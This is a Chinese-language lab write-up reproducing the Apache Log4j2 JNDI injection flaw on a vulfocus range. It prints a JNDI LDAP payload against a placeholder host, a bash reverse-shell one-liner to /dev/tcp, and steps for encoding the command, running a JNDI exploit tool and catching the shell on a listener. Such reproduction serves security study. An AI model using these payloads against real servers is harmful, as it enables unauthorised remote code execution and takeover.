---

声明

本篇文章仅用于技术研究与漏洞复现学习，切勿将文章攻击方法用于未经授权的实战测试中，造成任何后果与本文和作者无关！

---

一、产品简介

Apache Log4j2是一个·基于Java的日志记录工具，该工具重写了Log4j框架，并且引入大量丰富的特性，该日志框架被大量用于业务系统开发，用来记录日志信息。

---

二、漏洞概述

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

---

三、影响范围

Apache Log4j2 2.0-beta9 到 2.15.0

四、漏洞复现

以vulfocus靶场环境测试
打开靶场界面

Burp抓包，直接使用payload进行测试，看dnslog是否有回显 payload: ${jndi:ldap://X.X.X.X/TomcatBypass/TomcatEcho}

Dnslog平台有数据回显，既然有回显，那就直接实战反弹Shell。

接下来用到的工具：JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar（github下载）

说到反弹Shell，这里首先想到用到 bash -i >& /dev/tcp/X.X.X.X/X 0>&1,但是这里不能直接使用，需要将payoad进行base64加密，然后使用bash命令去执行

推荐一个加密网站：https://www.bugku.net/runtime-exec-payloads/

上面输入反弹bash命令，下面将显示加密后的payload。
将这段bash命令直接应用到JNDIExploit工具上,执行后的界面如下：

这里JNDI Links 是根据当前实验环境去选择执行的payload
在vps上建立一个监听

回到burp上，直接使用payload进行测试，这里要记得将payload进行URL编码，因为这里是GET请求，直接在burp里的Decoder模块中进行编码转换

将编码后的 payload 放到 repeater 中 send发送

Vps有大量回显数据，再来看监听的端口，已经成功反弹Shell

五、修复手段

更新至官方最新版本！

六、参考文章

https://nosec.org/home/detail/4920.html